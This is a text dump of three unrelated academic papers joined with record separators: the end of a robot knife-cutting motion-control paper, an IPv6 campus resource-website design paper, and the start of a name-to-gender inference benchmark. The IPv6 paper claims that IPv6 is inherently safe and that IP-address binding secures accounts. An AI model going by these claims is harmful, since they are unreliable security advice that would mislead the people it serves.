point of interaction. These are illustrated as ĉa and ŝa, respectively. Interpretation of the data for the recorded forces in a Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 9/13 https://peerj.com https://doi.org/10.7717/peerjcs.304/fig-2 https://doi.org/10.7717/peerjcs.304/fig-3 http://dx.doi.org/10.7717/peerj-cs.304 Figure 4 The setup of the knife and object. The cutting and shearing directions used for commanding the motion is aligned with the knife, whereas the actual cutting and shearing directions depend on the an- gle of the knife blade in the region of interaction.(A) Photo of the setup of robot, knife, and object. Photo credit: Morten Lind, 2020. (B) Illustration of controlled and actual cutting and shearing directions. Image credit: Morten Lind, 2020. Full-size DOI: 10.7717/peerjcs.304/fig-4 Figure 5 Position and force recording sampled through a cutting process. Image credit: Morten Lind, 2020. (A) Commanded trajectory of the knife along the ĉc and ŝc directions. Image credit: Morten Lind, 2020. (B) Forces acting on the knife along the ĉc and ŝc directions. Image credit: Morten Lind, 2020. Full-size DOI: 10.7717/peerjcs.304/fig-5 cutting experiment is deeply dependent of the recognition of the relation between these commanded and actual directions. A cutting experiment is executed by moving the knife in a cyclic series of strokes, forward strokes in the positive ŝc direction and backward strokes in the negative ŝc direction, while progressing steadily in the positive ĉc direction. The motion of the knife happens thus in a plane spanned by the ĉc and ŝc. The commanded position trajectory is shown in Fig. 5A. The origin of the positions is where the knife is held at the start of the cutting process. The corresponding forces on the knife along the ĉc and ŝc directions, based on the estimated wrench obtained from libfranka in the FMS, is seen in Fig. 5B. In an ideal experiment one would expect a constant, negative cutting force in the ĉc direction and a square wave shearing force, symmetric around zero, in the ŝc direction. Both of these would be smoothly modulated in size by the initially increasing, and later decreasing, interaction of the knife with the object as it passes through it. There are a couple of deviations from this ideal, qualitative behaviour. Most noteworthy is the non-smoothness of the direct cutting force. Next is the asymmetry around zero of the shear force. Both of these are easily understood by the illustration of the actual cutting and shearing directions observed in Fig. 4B. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 10/13 https://peerj.com https://doi.org/10.7717/peerjcs.304/fig-4 https://doi.org/10.7717/peerjcs.304/fig-5 http://dx.doi.org/10.7717/peerj-cs.304 DISCUSSION The current major challenge regards the blackouts in the communication between MA, FMS, and FCI. For a reliable and stable system, this must be addressed by real-time hardening of the computing environment on which the application runs. However, this is fairly unrelated to the soundness of the presented approach and reference implementation. Particularly for knife-cutting applications, the discussion about a negative bias on the cutting and shearing forces, observed in Fig. 5B, due to the deviation from the commanded directions, is interesting for future development. It shows that an edge-object-interaction observer should be developed, which will certainly be important for correct execution of the cutting process. The presented implementation will be used for future experiments in two directions involving real-time force feedback to the trajectory generation. Firstly in the direction of explicitly modelling the cutting process, based on such work as that of Reyssat et al. (2012). Secondly, on the more implicit learning approach to cutting presented by Lenz, Knepper & Saxena (2015). Another application area, for which the presented implementation is intended, is that of grasping of unknown or variable objects. The vision-based servo control involved with ‘‘closed-loop grasping’’ is executing at a fairly low frequency; in the order of 5 Hz according to Morrison, Leitner & Corke (2018). Thus, whereas it is expected that the required frequency and tracking delay will be a challenge for a Python-based application when it comes to real-time control of cutting, this is not expected to be a challenge for real-time grasping applications. It was originally under consideration to use the Reflexxes (http://reflexxes.ws) library developed by Torsten Kröger for the underlying interpolation mathematics in the presented Motion Service process. However, the Reflexxes version under a free software license, LGPL V3.0, only provides C1-smooth trajectories. For generating C2-smooth trajectories, a commercial license of Reflexxes must be purchased. The presented software is intended to be free (GPL), and thus the Reflexxes library was not chosen. CONCLUSION In summary, this work has • established a re-connectable real-time motion service via the Franka Control Interface for the Panda robot; • characterized the real-time trajectory execution performance by illustrating the tracking delay; • demonstrated that real-time motion application from Python is possible; • indicated the feasibility of using the external force-torque estimator provided by libfranka at the real-time application level. ACKNOWLEDGEMENTS Thanks to Ekrem Misimi at SINTEF Ocean for general guidance and for supporting the work. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 11/13 https://peerj.com http://reflexxes.ws http://dx.doi.org/10.7717/peerj-cs.304 ADDITIONAL INFORMATION AND DECLARATIONS Funding The underlying work and the writing of this paper was funded by the Norwegian Research Council (https://www.forskningsradet.no/en/) in the project ‘‘Innovative and Flexible Food Processing Technology in Norway’’ with project number 255596 (https://prosjektbanken.forskningsradet.no/#/project/NFR/255596). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Norwegian Research Council. Innovative and Flexible Food Processing Technology in Norway: 255596. Competing Interests Morten Lind is an employee of SINTEF Manufacturing AS. The author declares that he has no competing interests. Author Contributions • Morten Lind conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is publicly available in the ‘‘Franka Motion Service" repository at GitLab: https: //gitlab.com/SINTEFManufacturing/franka_motion_service.git. Data are publicly available in the ‘‘FMS Test Data" repository at https://gitlab.com/SINTEFManufacturing/fms-test- data.git. REFERENCES Andersen TT. 2015. Optimizing the Universal Robots ROS driver. Technical report. Technical University of Denmark, Department of Electrical Engineering. Available at https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver. Andersen TT, Amor HB, Andersen NA, Ravn O. 2015. Measuring and modelling delays in robot manipulators for temporally precise control using machine learning. In: 2015 IEEE 14th international conference on machine learning and applications (ICMLA). Piscataway: IEEE, 168–175. Eggen R, Eggen M. 2019. Thread and process efficiency in python. In: Proceedings of the international conference on parallel and distributed processing techniques and applications. 32–36. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 12/13 https://peerj.com https://www.forskningsradet.no/en/ https://prosjektbanken.forskningsradet.no/#/project/NFR/255596 https://gitlab.com/SINTEFManufacturing/franka_motion_service.git https://gitlab.com/SINTEFManufacturing/franka_motion_service.git https://gitlab.com/SINTEFManufacturing/fms-test-data.git https://gitlab.com/SINTEFManufacturing/fms-test-data.git https://orbit.dtu.dk/en/publications/optimizing-the-universal-robots-ros-driver http://dx.doi.org/10.7717/peerj-cs.304 Finn DL. 2004. Quintic hermite interpolation. Course notes. Available at https://studylib. net/doc/11701439/ma-323-geometric-modelling-course-notes--day-09-quintic-h.... Krogh FT. 1970. Efficient algorithms for polynomial interpolation and numerical differentiation. Mathematics of Computation 24(109):185–190 DOI 10.1090/S0025-5718-1970-0258240-X. Kröger T, Wahl FM. 2010. Online trajectory generation: basic concepts for instantaneous reactions to unforeseen events. IEEE Transactions on Robotics 26(1):94–111 DOI 10.1109/TRO.2009.2035744. Lenz I, Knepper RA, Saxena A. 2015. DeepMPC: learning deep latent features for model predictive control. In: Kavraki LE, Hsu D, Buchli J, eds. Proceedings of Robotics: Science and Systems XI. Sapienza University of Rome, Rome: RSS Foundation. Available at https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss2015.pdf . Lind M, Schrimpf J, Ulleberg T. 2010. Open real-time robot controller framework. In: Lien TK, ed. CIRP conference on assembly technologies and systems. NO-7005, Trondheim: Tapir Academic Press, 13–18. Lind M, Tingelstad L, Schrimpf J. 2012. Real-time robot trajectory generation with python. In: Workshop on robot motion planning: online, reactive, and in real-time. IEEE/RJS. Mihelj M, Šlajpah S, Čepon P, Munih M. 2012. yControl - open architecture controller for Yaskawa Motoman MH5 robot. In: 2012 IEEE international conference on control applications. Piscataway: IEEE, 1051–1056. Morrison D, Leitner J, Corke P. 2018. Closing the loop for robotic grasping: a real-time, generative grasp synthesis approach. In: Kress-Gazit H, Srinivasa SS, Howard T, Atanasov N, eds. Proceedings of Robotics: Science and Systems XIV, Carnegie Mellon University. Pittsburgh: RSS Foundation DOI 10.15607/RSS.2018.XIV.021. Reyssat E, Tallinen T, Merrer ML, Mahadevan L. 2012. Slicing softly with shear. Physical Review Letters 109(24):244301 DOI 10.1103/physrevlett.109.244301. Schrimpf J. 2013. Sensor-based real-time control of industrial robots. PhD thesis, Norwe- gian University of Science and Technology, Trondheim, Norway. Schrimpf J, Lind M, Mathisen G.. 2013. Real-time analysis of a multi-robot sewing cell. In: 2013 IEEE international conference on industrial technology (ICIT). Piscataway: IEEE, 163–168. Spitzbart A. 1960. A generalization of Hermite’s interpolation formula. The American Mathematical Monthly 67(1):42–46 DOI 10.1080/00029890.1960.11990316. Lind (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.304 13/13 https://peerj.com https://studylib.net/doc/11701439/ma-323-geometric-modelling-course-notes--day-09-quintic-h... https://studylib.net/doc/11701439/ma-323-geometric-modelling-course-notes--day-09-quintic-h... http://dx.doi.org/10.1090/S0025-5718-1970-0258240-X http://dx.doi.org/10.1109/TRO.2009.2035744 https://cs.stanford.edu/people/asaxena/papers/deepmpc_rss2015.pdf http://dx.doi.org/10.15607/RSS.2018.XIV.021 http://dx.doi.org/10.1103/physrevlett.109.244301 http://dx.doi.org/10.1080/00029890.1960.11990316 http://dx.doi.org/10.7717/peerj-cs.304 work_qr5wenjkarbr7dbdgeia4qpux4 ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 54 Design of University Resource Website and Security Measures in IPV6 Chunmei Li Department of computer technology and application， Qinghai University Xining, China e-mail: ChunmeiLi@xyz.com Peng Cui Department of computer technology and application， Qinghai University Xining, China e-mail: PengCu@xyz.com Xinke Zhou Department of computer technology and application， Qinghai University Xining, China e-mail: XinkeZhou@xyz.com Ze Xiao Department of computer technology and application， Qinghai University Xining, China e-mail: ZeXiao@xyz.com Abstract—In this paper authors introduced the overall design of learning resource sharing platform in the pure IPv6 environment, including the client and the web server and the back-end database, and the user management, the detailed design of the three aspects of resource management platform and administrator management. Finally authors introduced application of decision tree in this website. Keywords-IPV6; Address Binding; Decision Tree I. INTRODUCTION With the development of computer technology, people's work style, lifestyle changes, the increasing demand for computer networks, and the rapid increase in the number of Internet users, making the urgent increase in IPv4 address requirements. The existing ipv4 address has long been unable to meet the demand. After the depletion of IPv4 address in Asian, Latin America, Europe and the United States and other regions , on September 24, 2015, North America also declared IPv4 address were exhausted, leaving only a small amount of the African region [1]. In order to maintain the use of ipv4 addresses, there are technologies such as NAT[2] (network address translation) technology, VLSM (variable long subnet mask) technology[3], CIDR[4] (no class interdomain routing) which can not solve the fundamental problem of IPv4 address depletion. So the technology translates from IPv4 to IPv6 and IPV6 environment in a variety of applications have been carried out in the world research, Japan and other countries in the study of IPV6 new technology has been at the forefront of the world. IPv6 address is 128 bits, which can represent the great address space, good scalability, better quality of service (Qos), security、 mobility and improve the efficiency of routing and other characteristics [5]. China has started the next generation of Internet Demonstration Project (CNGI) project in 2003, one of the countries with relatively advanced global start and multiple IPv6 addresses, but the use of IPv6 addresses is far behind, The conversion of IPV4 and IPV6 uses three techniques, namely, dual-station protocol technology[6], tunneling technology[7][8] and translation technology (also called protocol conversion technology)[9]. At present, the most widely used technology is dual station technology. In this paper, IPV6[10][11] itself is inherently safe, the address is unique, the address is wide and the transmission speed is fast. In the pure IPV6 environment, it is proposed to develop the campus learning resource sharing platform based on ipv6, which can realize the upload of various learning resources Download, in order to achieve the real learning resources to share, as a common progress, learn from each other, to discuss each other, so as to improve the quality of teaching, improve teaching effectiveness. II. THE OVERALL DESIGN OF LEARNING RESOURCE SHARING PLATFORM A. Overall design The learning resource sharing platform is divided into two modules: client and server, As shown in figure 1. Figure 1. Overall design 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 55 The learning resource sharing platform[12] is divided into two types of users: learners and administrators, learners upload and download and browse learning resources, communicating with each other through the message board; administrators of learning materials and message content audit, management[13]. The general function of the system for the user is to upload learning materials and the corresponding description of the data, after the review by other users can download the use of the user after the use of the data can be evaluated, feedback to the platform of the message board. All users who have registered in this platform can upload and download student resources. Before uploading, you need to verify the IPv6 address and user identity. The uploaded resources need to be audited before being downloaded. Resources need to be feedback and evaluation after downloading resources. The development of the above platform is and the use of pure ipv6 environment is carried out. B. Detailed Design 1) User Management a) User registration and login Users can register through the registration web page on the platform to become a user member of the platform. In this case, the user's IP address should be obtained and bound with its account. After success of the registration, the user can login through the login web page on the platform. After logging in, you can upload, download, play online and message and other operations. Unregistered or unregistered users can browse the resources on this platform, but they can’t do the above operations. They can only use it before logging in. b) Account management Users can use the personal information web page to view the current user's registration information. In the meanwhile, we can update the user's property or modify the password through the web page. Of course, for the user who forget the password, they can log in the web page to find the password to jump to modify the page to modify. When the login account is different form the last login ipv6 address, we can determine whether the new ipv6 the address is the same to the old. If it is, we allowed to continue to log in; if not in the same network account, prompts him to answer questions, the answer is correct, allowing it to continue to visit; otherwise, continue to answer questions, three times to prevent access to this Law to prevent non-I upload illegal information, or to prevent non-I am injected into the illegal operation of virus files to protect the safety of users and resources. C. Resource management The platform is a resource sharing platform which needs to cover all aspects of teaching resources. The platform in accordance with the discipline of resources classification, and real-time update resources. The main functions of it are: upload, download, online, message and so on. 1) Resource upload and download Users can upload the various forms of resources, whose types are not limited. For example, you can upload Word documents, PPT courseware, Flash animation and video resources. The suffix of the resource can be. Doc, .ppt, .zip, .rar, .swf and .TIF and so on. Only the resource information of the resource file is stored in the database. The website provides the resource download service according to the resource path. The uploaded resource file is usually stored in a subdirectory under the root directory of the website. Users can only release resources after log in. Users can fill out the information of the resource name, detailed information and other information. When users publish resources to determine whether the user's IPv6 address and the registration of the IPv6 address in the same network, if the same network, the user can upload data, if not in the same network, you need to answer specific questions to ensure the safety and reliability of users and resources. Users can download the various forms of resources on the platform, each resource below the corresponding download. After the user clicks the download button, the download box will pop up, the path will be selected to click to start the download, and the user can select the default download path. After the completion of access to the appropriate path to view resources. 2) Resources online browsing Users can browse some of the resources in the system, that is, you can browse the resources online without downloading. Users simply click on the play button below the resource, you can browse online. For users who do not have the button to play, the user can only download and browse. 3) Message module The user can comment on a resource, they can also reply to the resources of other users to ask questions, in order to achieve the purpose of interactive learning; users can delete their own message, the administrator can delete the message, the message can not be edited. D. Administrator management Administrators can view, upload, download, delete resources, they can set the upload resource size limit, for the user to upload the resources for review, pending approval before the resource can be used. At the same time the administrator can also view, send and delete messages. Of course, as with the user to upload resources, the administrator login after the implementation of administrative authority before the need for IPv6 authentication to determine the administrator's IPv6 address and the registration of the IPv6 address is the same network segment. If they are in same network segment, the management administrator can perform administrative privileges, and if it is no longer in the same network segment, the administrator needs to answer specific questions to perform administrative privileges. Thus ensuring that the administrator himself is in operation to prevent others from maliciously executing administrator privileges. To ensure the safety of system operation. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 56 III. SECURITY MEASURES FOR LEARNING RESOURCE SHARING PLATFORM OF IPV6 A. The characteristics of IPv6 ensure the safety of network resources Because IPv4 is just a simple network interworking protocol, a large number of security issues are not considered in, and IPv6 achieves IP-level security. Ipsec is a series of security protocols that define the security services used at the Internet layer. Features of it includes data encryption, access control to network elements, data source address verification, data integrity checking, and replay prevention.IPv6 includes IPSec protocol, which can protect users from some network attacks[14]. B. A huge resource of IPv6 addresses makes it possible to determine the one-to-one relationship between users and addresses Since an IPv6 address is 128 bits, theoretically there are 2 ^ 128 different IPv6 addresses. So basically it is guaranteed that everyone has a unique IPv6 address. This guarantees a true one-to-one correspondence between the user and the IP address. IPv6 does not support subnet masks. It only supports subnet prefix identification. The IPv6 prefix uses an address prefix similar to the CIDR mechanism in IPv4 addresses. IPv6 uses address prefixes to identify networks, subnets, and routes. The IPv6 address is divided into two parts: the subnet prefix and the interface identifier [15]. C. IPv6 address and user information binding One-to-one relationship between users and addresses ensure each user has a unique IPv6 address. This makes it possible to bind ip addresses to user information. The purpose of binding user information and user IP address is when you login next time, we can determine whether the same person in operation. If the user login address is same as the last ip address, then at least we can ensure the user or authorized others are operating. If it is not my own operations, then we can confirm whether it is himself by asking questions, if the answer is incorrect, only allow users to browse, but not allow other upload or download or leave a message and other operations. Thus the system ensure the security of user information, but also protect the network resources and management of the security. D. Application of Decision Tree Algorithm in Security Assurance When the user register, we will get the user's IPv6 address and bind the user's information to their IPv6 address. When the user login again, we first determine whether the user's IPv6 address and the IPv6 address bound to it are in a campus network. If the user is in the same campus network, we use method1. The user can directly upload data, download resources, learn online, message interaction and other operations. If not in the same campus network to determine whether in a city. If they are in a city, then we use the method2, the user needs to enter the verification code, the verification code is correct, continue to use method1.If they are not in a city , we determine whether it is the national address, if it is from other domestic cities ipv6 address, then we use the method3, the user answered specific questions, if the problem is correct he can continue to access, we use method 1, or only have the right to browse or directly denied access to this site. This to ensure the safety of users, the safety of learning resources and management of the safety and reliability, this to ensure the safety of the entire learning resources platform. We analyzed ipv6 address in the experiment and divided into four categories in Table 1 below, and four kinds of ipv6 addresses for different treatment. In this process, if the ipv6 address is wrong ,the website will direct denial of access after prompt error. In general, there will not be wrong ipv6 address, ipv6 address in the ipv6 library are automatically obtained by the system. TABLE I. FOUR TYPES IPV6 ADDRESS Whether campus website Whether city website Whether Other Chinese cities Whether Foreign website Processing method Yes No No No method1 No Yes No No method2 No No Yes No method3 No No No Yes method4 Therefore, we firstly classified ipv6 address based on the address of the library. Of course, for each user ipv6 library, the ipv6 address is not the first time that the address of the application, but each time you use the address of these four categories ways to accumulate statistics, what kind of login the most frequently used, the data in the ipv6 library will be updated to the most frequently used ipv6 address. Based on the classification process, the decision tree [16] is used to make the classification decision. The decision tree is as follows: Figure 2. Processing decision tree IV. CONCLUSION The resources provided by the website include images, text, video and other types, the content is not limited to the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 57 school curriculum knowledge. Rich and comprehensive learning resources for students to provide class and extracurricular learning opportunities. Based on the realization of ipv6 makes the site security, user and resource security has greatly improved. The speed of access and download makes it unnecessary to wait for too long. The binding of IPv6 address and user information makes the user upload the resource reliability to ensure the security of the user, the security of the learning resource and the security of the management And reliability, thus ensuring the safety of the entire learning resource platform. The resources of the learning resource sharing platform and user and information reliability determine the utilization of the platform, is a major supplement to school teaching, improve the quality of teaching and teaching results. ACKNOWLEDGMENT Thanks for fund surpporting by the project :The next generation of Internet innovation projects in the SEIR network, fund number: NG1120160503 REFERENCES [1] Zhu Shuang. September North America IPv4 address exhausted [J]. China Education Network, 2015 (11): 43-43.J. Clerk Maxwell, A Treatise on Electricity and Magnetism, 3rd ed., vol. 2. Oxford: Clarendon, 1892, pp.68–73. [2] Sun Zhongting. NAT technology to solve the problem of IP address shortage [J] .Computer and network .2013 (20): 67-69. [3] Wang Ning. VLSM technology in the application of IP address management [j]. Computer CD-ROM software and applications .2010.5: 41-42 [4] Li Ruijun.CIDR-based network IP address planning and application [J]. Journal of Changchun Normal University (Natural Science Edition) .2014.10.33 (5): 33-36. [5] Xia Feng. Research and Implementation of Key Technology of Distance Education System Based on IPv6 [J]. Journal of Xi'an Jiaotong University,2014. [6] Guo-liang Han, Cong-xiao Bao, Xing Li. A scalable and efficient IPv4 address integration approach in IPv6 transition scenarios [J]. Frontiers of Information Technology & Electronic Engineering. August 2015, Volume 16, Issue 8, pp 634-645. [7] Wu Zhaoxiong, Liang Xiongxiong.Using the GRE Tunneling Technology to Access the Meteorological Local Area Network Method [J] .Guangdong Meteorology .2016.4.38 (2): 73-76. [8] CHENG Si, CHENG Jia-xing. Research on Tunneling Technology in VPN [J] .Computer Technology & Development .2010.2.20 (2): 156- 159. [9] GAO Zheng-ming, ZHAO Yong, BAO Wei-hua. Technology and Realization of PROFIBUS DP / PA Network Protocol [J]. Instrumentation Standardization and Metrology .2014.4: 25: 27. [10] Li Changhua, Cui Chenzhou, etc. IPv6 technology in astronomy research cloud computing environment application [j]. Journal of Computer Applications.2016,36 (S1): 25-28. [11] Ge Jingguo, Mi Wei, Wu Yulei.IPv6 transition mechanism: research review, evaluation index and deployment considerations [J] .Journal of Software 2014.4: 896-912. [12] HUANG Zhang-shu, LI Bao-yu, CHEN Cui-ping. Design of Customer Knowledge Sharing Resource Library Platform Based on Cloud Computing [J]. Modern Information .2015.4.35 (4): 69-74. [13] Zhang Tao. IPv6 a number of security issues [D]. Chinese Academy of Sciences Graduate School (Institute of Software), 2005. [14] Liu Haifeng, Wang Lixin. Implementation of IPv6 video on demand system based on Think PHP framework [J]. Journal of Jilin Institute of Engineering Technology, 2016, 32 (2): 74-76. [15] Qing Hui. IPv6-based multicast technology and application system research [D]. Wuhan University of Technology, 2008. [16] ZHOU Dangdang, SU Yong. Television Ratings Prediction Research Based on Decision Tree. work_qrknnrsfj5d3xinxeligze6g4i ---- Submitted 19 February 2018 Accepted 3 June 2018 Published 16 July 2018 Corresponding author Lucía Santamaría, lucia.santamaria@ymail.com Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.156 Copyright 2018 Santamaría and Mihaljević Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Comparison and benchmark of name-to- gender inference services Lucía Santamaría1,* and Helena Mihaljević2,* 1 Amazon Development Center, Berlin, Germany 2 University of Applied Sciences, Berlin, Germany * These authors contributed equally to this work. ABSTRACT The increased interest in analyzing and explaining gender inequalities in tech, media, and academia highlights the need for accurate inference methods to predict a person’s gender from their name. Several such services exist that provide access to large databases of names, often enriched with information from social media profiles, culture-specific rules, and insights from sociolinguistics. We compare and benchmark five name- to-gender inference services by applying them to the classification of a test data set consisting of 7,076 manually labeled names. The compiled names are analyzed and characterized according to their geographical and cultural origin. We define a series of performance metrics to quantify various types of classification errors, and define a parameter tuning procedure to search for optimal values of the services’ free parameters. Finally, we perform benchmarks of all services under study regarding several scenarios where a particular metric is to be optimized. Subjects Data Mining and Machine Learning, Data Science, Databases, Digital Libraries Keywords Name-based gender inference, Classification algorithms, Performance evaluation, Gender analysis, Scientometrics, Bibliometrics INTRODUCTION Quantitative measurements and large-scale analyses of social phenomena in relation to gender are gaining significance as tools to uncover areas of gender bias and inequality, and to ultimately foster women’s inclusion and advancement. Algorithms that can infer the gender category from other features have thereby opened up new opportunities to enhance data previously lacking such information. Examples include social media profiles, GitHub contributors, and authors of scientific publications, the analysis of which regarding gender has led to a better understanding of women’s situation in domains such as tech (Vasilescu, Serebrenik & Filkov, 2015), media (Matias, Szalavitz & Zuckerman, 2017; Macharia et al., 2015), and academic publishing (Larivière et al., 2013a; West et al., 2013; Mihaljević-Brandt, Santamaría & Tullney, 2016; Bonham & Stefan, 2017b). Particularly in the latter case of bibliometric studies, the most reliable piece of information available for guessing a gender is the name string of the author. The standard approach for name-to-gender inference is based upon querying large (and often openly available) name repositories, such as censuses, administration records, and universal or country-specific birth lists. Occasionally, results are refined with name-forming rules for specific cultures or ethnicities. In the attempt to identify the gender of as many names as How to cite this article Santamaría and Mihaljević (2018), Comparison and benchmark of name-to-gender inference services. PeerJ Comput. Sci. 4:e156; DOI 10.7717/peerj-cs.156 https://peerj.com mailto:lucia.santamaria@ymail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.156 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.156 possible, often a multi-step combination of database queries, insights from sociolinguistics, and manual corrections is performed. This leads to non-transparent processes for gender inference that might be troublesome to reproduce and almost impossible to test, compare, and transfer. Recently, the plethora of self-labeled data arising from social media has been successfully leveraged to improve the accuracy and specificity of methods based on querying compiled lists of names. This input has given rise to a handful of free and paid web services that infer gender from name strings. They usually gather data from manifold sources and profit from a greater degree of diversity, notably in regard to the origin of names, thus becoming a good choice for analyses outside of a national context. Access to such services is typically granted through APIs, turning gender inference on large corpora into a fast, reliable, and cost-effective process. Using them in large-scale analyses is tempting due to their accuracy and availability; nonetheless, some caveats may apply, as the underlying data sources are frequently closed and thus not necessarily reliable nor verifiable. It is perhaps no surprise that, with few exceptions, the majority of research that uses name-based gender assignment does not evaluate the chosen method nor justifies the decision to use particular data sources and inference methodologies. Furthermore, only a handful of studies have attempted to compare different approaches and provide solid groundwork for the choice of a given tool. We intend to fill this gap by presenting a comprehensive benchmark and comparison of several available gender inference services applied to the identification of names stemming from the academic publishing community. We evaluate web services Gender API, genderize.io, NameAPI, NamSor and Python package gender-guesser, five popular and commonly used methods for the problem at hand. All services are able to handle an international set of names and are thus singularly valuable for bibliographic analyses. After describing the services broken down by several decision-critical properties, such as data sources, accessibility, and cost, we test each of them on a manually labeled data set consisting of 7,076 names, which we make publicly available to interested researchers working on this topic (Mihaljević & Santamaría, 2018). Several metrics of relevance for the classification problem are defined, distinguishing between misclassifications, i.e., assignments of the wrong gender to a name, and cases for which it is not possible to predict a gender, denominated non-classifications. To optimize for the metrics we perform repeated, cross-validated, randomized searches over the free parameters of the services. For Gender API, genderize.io, and NamSor we report error rates under 15% for inaccuracies including non-classifications, under the constraint that the misclassification error amounts to a maximum of 5%. The three services also achieve less than 2% error for misclassifications when imposing that at least 75% of all names be assigned a gender. Gender API is in general the best performer in our benchmarks, followed by NamSor. The cultural context of a name is known to have an impact on gender inference; to assess its importance we have used NamSor’s origin API to predict the most likely origin of the names and split our analysis with respect to this facet. As expected, the less confident predictions occur for names of Asian origin. We quantify the effect of the names’ Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 2/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 provenience on the results of the surveyed gender assignment services; overall, Gender API outperforms all others for Asian names as well. To the best of our knowledge, this is the most comprehensive comparison of gender assignment algorithms for the field of bibliometric analyses performed to date. The results of our analysis are meant to be the basis for further claims of gender assignment accuracy in future studies on the topic. Related work Bibliometric studies based on systematic assignment of gender with the purpose of analyzing specific aspects of the academic landscape have been conducted for at least a decade. Mozaffarian & Jamali (2008) studied the productivity of Iranian women in science by analyzing over 2,500 publications by Iranian authors from 2003, taken from WoS. Gender inference was done manually, resorting to an internal list of Iranian academics and to Internet searches. While not scalable, this approach showed that a high degree of familiarity with names from a particular country greatly aids the gender inference task. The article reported lower productivity of Iranian female authors with respect to their male counterparts. With a much broader scope, Frietsch et al. (2009) considered patent applications from 14 European countries between 1993 and 2001 and publications in eight scientific areas from 1996 to 2006, extracted from Scopus. Comprehensive and country-specific lists of names collected, post-processed, and tested by Naldi et al. (2005) were applied to assign a gender to inventors and authors. The analyzed data set comprised almost 2,500,000 inventors and 500,000 authors from over 150,000 publications, after rejecting over 60% of names that could not be assigned a definite gender. Findings included stark national differences in female contributions, with central European countries being the most prone to exhibit a wide gender gap. Recently, various studies have focused on large-scale, scalable bibliometric analyses of academic publications in relation to gender. West et al. (2013) analyzed over 1,500,000 publications from JSTOR, a digital library corpus in science and humanities. They could assign a gender to 73% of authors with full first names by using data from the US Social Security Administration records. Their analysis showed that authorships by women are not evenly distributed over the dimensions time, field, coauthorship, and authorship position. A similar approach was followed by Larivière et al. (2013a), who resorted to both universal and country-specific sources such as the US and Quebec censuses, WikiName portal, Wikipedia, and various Internet sites to assign a gender to all articles between 2008 and 2012 indexed in WoS. This resulted in more than 5,000,000 articles and over 27,000,000 authorship instances, 86% of which could be assigned a gender, provided a full first name was available. They reported significant gender disparities, such as fewer citations for articles with women in dominant author positions, as well as underrepresentation of women as first authors. Analogous findings, but restricted to mathematics, were reported by Mihaljević-Brandt, Santamaría & Tullney (2016), who analyzed over 2,000,000 publications from bibliographic service zbMATH between 1970 and 2014. Using the names list from Michael (2007), they could assign a gender to 61% of all authorship instances. Most recently, Holman, Stuart-Fox & Hauser (2018) estimated the gender gap in STEMM Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 3/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 disciplines with help of the PubMed and arXiv databases. Thirty-six million authors with publications over the last 15 years were assigned a gender using genderize.io, which is one of the services that we evaluate. Their results confirm previously reported high variations of the gender gap across countries. Furthermore, according to their data model, gender parity won’t be reached during this century in various fields, including mathematics, physics, and computer science. It is worth mentioning that all four above-mentioned studies performed some kind of validation of their gender inference methods, yet there is room for improvement regarding assessment of manual gender labels, data size, or reproducibility. For instance, Holman, Stuart-Fox & Hauser (2018) estimate their gender misclassification rate to be 0.3% based on a collection of 372 manually labeled author names via Web searches. Considering the expected name variance, an extrapolation of the error estimate to the entire data set does not seem reliable. Despite its importance for estimating the error rate on gender assignments, only a few studies are devoted to comparing different gender inference tools. Vanetta (2014) tested and compared four gender assignment methods (beauvoir, Sexmachine, genderPredictor, and genderize.io) on a control group provided by a government office and consisting of over 400 first names. No claims were made as to which one of the services was better, arguing that different purposes may pose different requirements to the services. Karimi et al. (2016) used the test set from Larivière et al. (2013a) to evaluate precision, recall and accuracy of several methods, including data from various censuses, genderize.io, face recognition algorithm Face++, and two novel approaches consisting of mixing the predictions of the latter two. They reported improved accuracy of the mixed methods, noting that the quality of the assignments depended on country and was worse for non- Western regions. The brevity of the paper prevents an extended discussion regarding the definition of the quality metrics, particularly in the handling of the predicted unknowns. At any rate, face recognition techniques clearly hold potential, albeit they must be used with caution in view of their likely intrinsic bias, e.g., towards darker-skinned females (Buolamwini, 2017). Similarly, equating country of residence with regional origin of a name does not seem to be a well suited assumption, given that academics often move internationally. Holman, Stuart-Fox & Hauser (2018) also query genderize.io with the country of affiliation, potentially incurring the same bias. A more extensive comparison is that of Wais (2016), who revisited the methods and results of Larivière et al. (2013a) and West et al. (2013), with the additional introduction of the R package genderizeR based on the genderize.io service. To compare the three approaches, a common test data set was evaluated that contained 2,641 authorships of 2,000 articles manually labeled using Internet searches. The results were compared in terms of the metrics described in ‘Performance metrics’. The method based on genderize.io outperformed the others, at least with respect to metrics that focus on retrieving a gender for as many names as possible. The percentage of non-classifications was consequently the lowest. While genderize.io and genderizeR seem to offer the best performance for gender prediction, the author points out the bias towards English names. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 4/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.156 Table 1 Comparison table showing relevant features for the gender inference services 